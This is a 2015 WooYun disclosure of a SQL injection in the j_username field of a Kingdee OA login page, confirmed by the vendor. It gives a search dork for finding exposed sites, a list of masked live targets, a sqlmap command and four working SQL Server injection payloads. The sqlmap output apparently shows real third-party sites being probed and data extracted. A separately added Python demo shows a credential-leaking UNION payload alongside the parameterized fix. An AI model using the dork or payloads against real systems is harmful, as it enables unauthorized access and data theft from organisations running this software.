Defect ID: WooYun-2015-0128680
Vulnerability title: Generic POST injection vulnerability in a Kingdee (金蝶) OA office system
Vendor: Kingdee (金蝶)
Author: 0x 80
Submitted: 2015-07-23 17:32
Published: 2015-10-22 10:22
Vulnerability type: SQL injection
Severity: High
Self-assessed Rank: 20
Status: Confirmed by vendor
Tags: (none)
2015-07-23: Details sent to the vendor, awaiting vendor response
2015-07-24: Vendor confirmed; details disclosed to the vendor only
2015-07-27: Details opened to third-party security partners (绿盟科技, 唐朝安全巡航, 无声信息)
2015-09-17: Details disclosed to core white hats and experts in the relevant field
2015-09-27: Details disclosed to regular white hats
2015-10-07: Details disclosed to intern white hats
2015-10-22: Details disclosed to the public
Generic POST injection vulnerability in a Kingdee OA office system. Turns out this is a generic injection; I hadn't noticed.
Search dork (Google / Baidu): inurl:/themes/mskin/login/  or  inurl://mskin/login/
POST data:
    j_mode=dynamic&j_from=oa&selectLoginType=static&j_username=&j_password=&Submit=login
Sites affected by the POST injection:
    http://**.**.**.**:7890/easoa/themes/mskin/login/login.jsp
    **.**.**.**:7890/oa/themes/mskin/login/login.jsp
    http://**.**.**.**:7890/oa/themes/mskin/login/login.jsp
    http://**.**.**.**/themes/mskin/login/login.jsp
    http://**.**.**.**/oa/themes/mskin/login/login.jsp
    http://**.**.**.**/oa/themes/mskin/login/login.jsp
    http://**.**.**.**/oa/themes/mskin/login/login.jsp
    http://**.**.**.**:7890/oa/themes/mskin/login/login.jsp
    http://**.**.**.**:7890/oa/themes/mskin/login/login.jsp
    http://**.**.**.**:81/oa/themes/mskin/login/login.jsp
    http://**.**.**.**/oa/themes/mskin/login/login.jsp
    http://**.**.**.**:7890/oa/themes/mskin/login/login.jsp
    **.**.**.**:7890/easoa/themes/mskin/login/login.jsp
    http://**.**.**.**:7890/easoa/themes/mskin/login/login.jsp
    http://**.**.**.**/oa/themes/mskin/login/login.jsp?login_error=quit
    http://**.**.**.**:7890/easoa/themes/mskin/login/login.jsp
    http://**.**.**.**:7890/oa/themes/mskin/login/loginFullScreen.jsp?login_error=
POST: sqlmap.py -u http://**.**.**.**:7890/easoa/themes/mskin/login/login.jsp --forms --dbs

    Place: POST
    Parameter: j_username
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: j_mode=static&j_from=oa&j_locale=zh_CN&selectLoginType=static&j_username=RACd' AND 9158=CONVERT(INT,(CHAR(58)+CHAR(107)+CHAR(104)+CHAR(109)+CHAR(58)+(SELECT (CASE WHEN (9158=9158) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(99)+CHAR(112)+CHAR(102)+CHAR(58))) AND 'wnuh'='wnuh&j_password=&Submit=login

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: j_mode=static&j_from=oa&j_locale=zh_CN&selectLoginType=static&j_username=RACd' UNION ALL SELECT NULL,NULL,CHAR(58)+CHAR(107)+CHAR(104)+CHAR(109)+CHAR(58)+CHAR(78)+CHAR(113)+CHAR(82)+CHAR(89)+CHAR(102)+CHAR(119)+CHAR(84)+CHAR(100)+CHAR(69)+CHAR(80)+CHAR(58)+CHAR(99)+CHAR(112)+CHAR(102)+CHAR(58),NULL,NULL--&j_password=&Submit=login

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: j_mode=static&j_from=oa&j_locale=zh_CN&selectLoginType=static&j_username=RACd'; WAITFOR DELAY '0:0:5'--&j_password=&Submit=login

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: j_mode=static&j_from=oa&j_locale=zh_CN&selectLoginType=static&j_username=RACd' WAITFOR DELAY '0:0:5'--&j_password=&Submit=login
    ---
    do you want to exploit this SQL injection? [Y/n] y
    [14:22:16] [INFO] the back-end DBMS is Microsoft SQL Server
    web server operating system: Windows 2000 or 7
    web application technology: Servlet 2.5, JSP, JSP 2.1
    back-end DBMS: Microsoft SQL Server 2008
http://**.**.**.**/themes/mskin/login/login.jsp
    I
    [14:27:08] [ERROR] unable to properly validate last character value ('M')..
    M
    [14:27:14] [ERROR] invalid character detected. retrying..
    [14:27:14] [WARNING] increasing time delay to 2 seconds
    [14:27:21] [ERROR] invalid character detected. retrying..
    [14:27:21] [WARNING] increasing time delay to 3 seconds
    [14:27:34] [ERROR] invalid character detected. retrying..
    [14:27:34] [WARNING] increasing time delay to 4 seconds
    [14:27:46] [ERROR] invalid character detected. retrying..
    [14:27:46] [WARNING] increasing time delay to 5 seconds
    ECONV
    [14:30:04] [ERROR] invalid character detected. retrying..
    [14:30:04] [WARNING] increasing time delay to 6 seconds
    [14:30:20] [ERROR] unable to properly validate last character value ('b')..
    b
    [14:30:53] [ERROR] invalid character detected. retrying..
    [14:30:53] [WARNING] increasing time delay to 2 seconds
    [14:31:10] [ERROR] invalid character detected. retrying..
    [14:31:10] [WARNING] increasing time delay to 3 seconds
    [14:31:23] [ERROR] invalid character detected. retrying..
    [14:31:23] [WARNING] increasing time delay to 4 seconds
    [14:31:48] [ERROR] invalid character detected. retrying..
    [14:31:48] [WARNING] increasing time delay to 5 seconds
    [14:32:23] [ERROR] invalid character detected. retrying..
    [14:32:23] [WARNING] increasing time delay to 6 seconds
    RT!A
    [14:33:27] [INFO] retrieved:
    [14:33:43] [ERROR] unable to properly validate last character value ('e')..
    eL
    [14:33:59] [ERROR] invalid character detected. retrying..
    [14:33:59] [WARNING] increasing time delay to 2 seconds
    O
    [14:34:24] [ERROR] invalid character detected. retrying..
    [14:34:24] [WARNING] increasing time delay to 3 seconds
    W
    [14:34:53] [ERROR] invalid character detected. retrying..
    [14:34:53] [WARNING] increasing time delay to 4 seconds

POST: sqlmap.py -u http://**.**.**.**:7890/easoa/themes/mskin/login/login.jsp --forms --dbs
POST injection in the j_username parameter.
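As an added illustration (not code from the report, and not Kingdee's own source, which is not shown here): a constructed model of the query shape sqlmap exploited above, where the j_username value is concatenated into the SQL text, next to the parameterized form that closes the hole. SQLite stands in for SQL Server 2008, so the table, column names and rows are made up for the demo, and `||` replaces SQL Server's `+` for string concatenation; the stacked-query and WAITFOR DELAY variants above are SQL Server specific and are not reproduced.

```python
"""Constructed model of a login handler with the j_username injection
described in this report, beside a parameterized version.
Added example; the schema and rows are invented for the demo and SQLite
stands in for the SQL Server 2008 backend sqlmap identified."""
import sqlite3


def setup() -> sqlite3.Connection:
    """Create an in-memory database with two constructed user rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE users (id INTEGER, username TEXT, password TEXT, "
        "email TEXT, role TEXT);"
        "INSERT INTO users VALUES (1, 'admin', 's3cret', 'admin@example.invalid', 'admin');"
        "INSERT INTO users VALUES (2, 'alice', 'hunter2', 'alice@example.invalid', 'user');"
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, j_username: str, j_password: str) -> list:
    """Builds the statement by string concatenation, the bug class sqlmap
    found: a single quote in j_username closes the literal and whatever
    follows runs as SQL. Five selected columns, like the 5-column UNION."""
    sql = (
        "SELECT id, username, password, email, role FROM users "
        "WHERE username = '" + j_username + "' AND password = '" + j_password + "'"
    )
    return conn.execute(sql).fetchall()


def login_fixed(conn: sqlite3.Connection, j_username: str, j_password: str) -> list:
    """Bound parameters: the values never become part of the SQL text, so
    the same payload is compared as an ordinary string and matches no row
    (the PreparedStatement equivalent in the JSP/Servlet stack reported)."""
    sql = (
        "SELECT id, username, password, email, role FROM users "
        "WHERE username = ? AND password = ?"
    )
    return conn.execute(sql, (j_username, j_password)).fetchall()


# Same shape as the "Generic UNION query (NULL) - 5 columns" payload in the
# sqlmap output: a junk prefix closes the string, UNION ALL appends
# attacker-chosen rows with the matching column count, and "--" comments
# out the password check. Table/column names are the constructed ones above.
UNION_PAYLOAD = (
    "RACd' UNION ALL SELECT NULL,NULL,username||':'||password,NULL,NULL FROM users--"
)


def leaked_credentials(conn: sqlite3.Connection) -> list:
    """Send the UNION payload through the vulnerable handler and return the
    user:password strings that come back in the third column."""
    rows = login_vulnerable(conn, UNION_PAYLOAD, "")
    return sorted(row[2] for row in rows if row[2] is not None)


if __name__ == "__main__":
    db = setup()
    print("vulnerable handler leaks:", leaked_credentials(db))
    print("fixed handler returns:", login_fixed(db, UNION_PAYLOAD, ""))
    print("legitimate login still works:", login_fixed(db, "alice", "hunter2")[0][1])
```

The error-based and time-based payloads on the page work the same way at the string-concatenation point; only what the attacker appends after the closing quote differs, which is why the fix is to bind j_username and j_password as parameters rather than to filter particular keywords.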
Severity: High
Vulnerability Rank: 18
Confirmed: 2015-07-24 10:21
Thank you for your attention to Kingdee and for finding this security vulnerability. We have notified the relevant department to fix it.
None yet.
OP submits several vulnerabilities a day! Do you have any pentesting video tutorials?
@泪雨无魂 No, I don't.
@0x 80 Come take a look in my group.
@0x 80 I've already joined your group; hoping to learn from you.
@0x 80 What's the group number?
@小懒虫 182910788
@0x 80 Please let me into the group, I can't get in.